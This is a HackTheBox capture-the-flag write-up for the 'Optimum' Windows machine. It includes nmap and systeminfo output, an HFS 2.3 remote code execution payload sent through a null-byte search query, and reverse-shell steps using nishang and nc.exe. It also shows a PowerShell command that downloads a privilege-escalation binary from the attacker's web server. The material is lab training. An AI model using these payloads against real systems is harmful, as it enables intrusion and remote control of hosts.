HackTheBox - Optimum

Starting with a basic nmap scan `nmap -sC -sV -Pn 10.10.10.8

                                                                                                                    1 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 18:03 IST
Nmap scan report for 10.10.10.8
Host is up (0.25s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.09 seconds

We have http server running on port 80

Searching in searchsploit we find that there is a remote code execution vulnerability in the http server

The file server has a vulnerability where we can send null character (%00) and the hfs command to execute command ({.exec | anycommand. } and we can get a remote code execution

For checking if we have RCE we send a ping command using the search query

%00 {.exec | ping 10.10.16.200. }

and we get back the response

so now we have remote code execution we will try to get a reverse shell

We are going to use module name 'Invoke-PowershellTcp.ps1' form the nishang tool to get back the reverse shell and Using burpsuite to send request to download the Invoke-PowershellTcp.ps1

example

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.200 -Port 1234

I don't know why but i'm not able to get the powershell script on the box and therefore we are now going to try another method

We get a exploit on exploitdb

https://www.exploit-db.com/exploits/39161

Now that we have the exploit we have to make some modifications

Change the ip and the port number and setup a listener on our kali machine

For the exploit to work we have to setup a python web-server at port 80 and a nc.exe binary and we will also have to execute the exploit multiple time for successful result

As we can see here that we have recieved a shell but we are a normal user and we get the user.txt flag

by running the systeminfo we get

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:  
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ��
System Boot Time:          30/5/2021, 5:03:35 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.405 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.593 MB
Virtual Memory: In Use:    910 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Now by transferring the winPEAS.exe binaray we can find something which we can use to escalate our privileges

We see that the machine is vulnerable to Integer Overflow (MS16-098)

We download the executable file form github and transfer it to the windows machine using our python server and run it

powershell Invoke-WebRequest -Uri 'http://10.10.16.200/admin.exe' -OutFIle amdin.exe

And now we have successfully become nt\authority